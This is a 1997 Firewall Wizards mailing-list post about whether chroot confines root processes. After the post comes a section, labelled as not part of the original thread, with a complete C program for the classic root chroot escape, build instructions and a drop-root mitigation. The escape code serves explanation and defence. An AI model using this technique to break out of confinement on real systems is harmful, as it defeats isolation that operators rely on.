Firewall Wizards mailing list archives
Re: chroot useful?
From: mcnabb () argus-systems com (Paul McNabb)
Date: Fri, 14 Nov 1997 16:43:38 -0600
From: Bernhard Schneck <Bernhard_Schneck () genua de>

In message <199711132205.RAA01373 () itd nrl navy mil> you write:
> I was under the impression that running the chroot() command on a UNIX
> box would make it impossible for all subsequently launched programs to
> access files located above the newly defined root point, even if such
> programs are launched with a UID of 0.
[...]
Probably most members of this list know already (or why would this be a
``wizzards'' list :-), but the usual unix/posix system call specifications
*require* a way to break out of a chroot environment (at least for root).

So either don't trust chroot, or don't be posix.
However, on Unix systems using privilege instead of root, a process with
UID=0 is treated like any other process in terms of chroot(). With the
Argus stuff, the privilege to override for chroot is separate from all
others, so you can in fact use chroot for isolation.

Of course with B-level security or capabilities (such as Decaf) you can
remove files and directories from the domain of a process, but this is
based on access control rather than namespace modification.

paul

---------------------------------------------------------
Paul McNabb                        Argus Systems Group, Inc.
Vice President and CTO             1809 Woodfield Drive
mcnabb () argus-systems com        Savoy, IL 61874 USA
TEL 217-355-6308                   FAX 217-355-1433
"Securing the Future"
---------------------------------------------------------
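The break-out that the quoted paragraph alludes to, shown as an added example that is not part of the original thread or of any poster's code. It assumes Linux/glibc, a writable /tmp, and root (CAP_SYS_CHROOT) for the escape itself; the names enter_jail, escape_jail and demo_chroot_escape are mine. The mechanism is the textbook one: chroot() moves the process root but not its working directory, and chdir("..") is only clamped at the process root, so a root process that chroot()s into a subdirectory without chdir()ing can walk its still-outside cwd up to the real root and chroot(".") there. Run as root it reports the escape; unprivileged, the first chroot() is refused with EPERM and the program says so instead.

```c
/*
 * Classic chroot() escape as root, added to illustrate the POSIX behaviour
 * the thread describes.  Not code from the original post.  Assumes Linux/glibc,
 * a writable /tmp, and root (CAP_SYS_CHROOT) for the escape to succeed.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Enter a jail the way a careful daemon would: chroot(), then chdir("/")
 * so the working directory is inside the new root. */
static int enter_jail(const char *jail)
{
    if (chroot(jail) != 0)      /* EPERM unless root / CAP_SYS_CHROOT */
        return -1;
    if (chdir("/") != 0)
        return -1;
    return 0;
}

/* The escape: chroot() to a subdirectory *without* chdir()ing, so the cwd
 * is now outside the root.  chdir("..") is only clamped at the process
 * root, so walking up from an outside cwd reaches the real filesystem
 * root; chroot(".") then makes that the process root again.  This needs
 * the same privilege as chroot() itself, which is why UID 0 can do it. */
static int escape_jail(void)
{
    if (mkdir("/x", 0700) != 0 && errno != EEXIST)
        return -1;
    if (chroot("/x") != 0)
        return -1;
    for (int i = 0; i < 256; i++)           /* deeper than any sane path */
        if (chdir("..") != 0)
            return -1;
    if (chroot(".") != 0)
        return -1;
    return 0;
}

/* Returns 0 if the jail confined us and the escape then broke out,
 * 2 if we lack the privilege to chroot() at all, 1 on any other failure.
 * The jail's own absolute path is the "outside" probe: it resolves before
 * entering and after escaping, but not from inside the jail. */
int demo_chroot_escape(void)
{
    char jail[] = "/tmp/jail.XXXXXX";      /* constructed scratch jail */
    char sub[64];
    int rc = 1;

    if (mkdtemp(jail) == NULL)
        return 1;
    snprintf(sub, sizeof sub, "%s/x", jail);

    if (access(jail, F_OK) != 0)            /* sanity: visible before */
        goto out;
    if (enter_jail(jail) != 0) {
        rc = (errno == EPERM) ? 2 : 1;
        goto out;
    }
    if (access(jail, F_OK) == 0)            /* must NOT resolve inside jail */
        goto out;
    if (escape_jail() != 0)
        goto out;
    if (access(jail, F_OK) == 0)            /* visible again: escaped */
        rc = 0;
out:
    rmdir(sub);
    rmdir(jail);
    return rc;
}

int main(void)
{
    int rc = demo_chroot_escape();
    puts(rc == 0 ? "escaped the chroot as root" :
         rc == 2 ? "not privileged: chroot() refused (run as root to see the escape)" :
                   "unexpected failure");
    return rc;
}
```

Build with `cc -o chroot_escape chroot_escape.c` and run as root to see the escape. The practical check this implies for anyone relying on chroot for isolation on a POSIX system: after chroot() and chdir("/"), drop root (setgid/setuid to an unprivileged user) before doing anything else, so the confined process no longer holds the privilege that chroot() itself requires; the message above describes privilege-based systems where that privilege is separated from UID 0 in the first place.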
Current thread:
- Re: chroot useful?, (continued)
- Re: chroot useful? Paul McNabb (Nov 12)
- Re: chroot useful? Steven M. Bellovin (Nov 13)
- Re: chroot useful? C Matthew Curtin (Nov 21)
- Re: chroot useful? Steven M. Bellovin (Nov 13)
- Re: chroot useful? Paul McNabb (Nov 12)
- Re: chroot useful? Douglas R. Steinbaum (Nov 13)
- Re: chroot useful? Darren Reed (Nov 14)
- Re: chroot useful? Steven M. Bellovin (Nov 14)
- Re: chroot useful? Aleph One (Nov 14)
- Re: chroot useful? Steven M. Bellovin (Nov 15)
- Re: chroot useful? Bernhard Schneck (Nov 14)
- Re: chroot useful? Paul McNabb (Nov 12)
- Re: chroot useful? Paul McNabb (Nov 14)
- Re: chroot useful? Paul McNabb (Nov 14)
- Re: chroot useful? Paul McNabb (Nov 14)
- Re: chroot useful? Anton J Aylward (Nov 15)
- Re: chroot useful? Steven M. Bellovin (Nov 16)
- Re: chroot useful? Anton J Aylward (Nov 15)
- Re: chroot useful? Darren Reed (Nov 16)
- Re: chroot useful? Anton J Aylward (Nov 16)
- Re: chroot useful? Anton J Aylward (Nov 16)
- Re: chroot useful? Darren Reed (Nov 16)
- Re: chroot useful? Rick Murphy (Nov 17)
- Re: chroot useful? Darren Reed (Nov 16)